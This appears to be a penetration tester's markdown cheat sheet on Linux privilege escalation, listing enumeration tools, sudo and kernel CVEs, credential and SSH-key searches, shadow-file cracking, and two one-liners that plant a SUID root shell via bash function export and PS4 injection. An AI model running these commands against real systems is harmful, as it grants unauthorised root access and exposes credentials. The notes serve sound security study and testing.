82 lines
2.5 KiB
Markdown
82 lines
2.5 KiB
Markdown
# Linux Privilege Escalation
|
|
|
|
## Links
|
|
* [Basics](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
|
* [LinEnum](https://github.com/rebootuser/LinEnum)
|
|
* [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)
|
|
* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
|
|
* [GTFObins](https://gtfobins.github.io/)
|
|
* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
|
|
|
|
## Kernel Exploits
|
|
|
|
### Dirty COW
|
|
* [CVE-2016-5195](https://dirtycow.ninja/)
|
|
* [c0w.c](../kernel-exploits/dirtycow)
|
|
|
|
## Stored Keys & Passwords
|
|
* History
|
|
* Environment Variables
|
|
* Config + Dot Files
|
|
* SSH keys
|
|
```sh
|
|
find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
|
|
```
|
|
|
|
## Permissions
|
|
* Weak permissions
|
|
* Umask
|
|
* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
|
|
* e.g. `john --wordlist=./wordlist --format=crypt hash`
|
|
* SUID
|
|
* list
|
|
```sh
|
|
find / -perm /6000 -ls 2>dev/null
|
|
```
|
|
* [Shared object injection](../../../exploit/linux/shared_object_injection.md)
|
|
* [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
|
|
* User specific files
|
|
```sh
|
|
find / -user root -name "*.txt"
|
|
```
|
|
|
|
## Sudo Binary
|
|
* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
|
|
* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)
|
|
* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)
|
|
* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)
|
|
* `sudo -l`
|
|
* Take a look at GTFObins
|
|
* Keep an eye on the displayed host and env capabilities
|
|
|
|
## PATH Hijacking
|
|
* Interpositioning binaries via PATH
|
|
* Look for binaries used in other bins and scripts
|
|
* Interposition name and add the directory in front of `$PATH`
|
|
|
|
## Bash function
|
|
* Interpositioning of binaries via bash functions
|
|
```sh
|
|
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
|
|
```
|
|
```sh
|
|
export -f /path/to/binary
|
|
```
|
|
* Call binary which invokes this function
|
|
|
|
## Environment Variable
|
|
```sh
|
|
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
|
|
```
|
|
|
|
## Capabilities
|
|
* [capabilities](../../../exploit/linux/capabilities.md)
|
|
|
|
## Crontab
|
|
* Check `cat /etc/crontab`
|
|
* Check writable scripts and binaries that are scheduled
|
|
* Check `$PATH` order
|
|
|
|
## NFS Rootsquash
|
|
* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)
|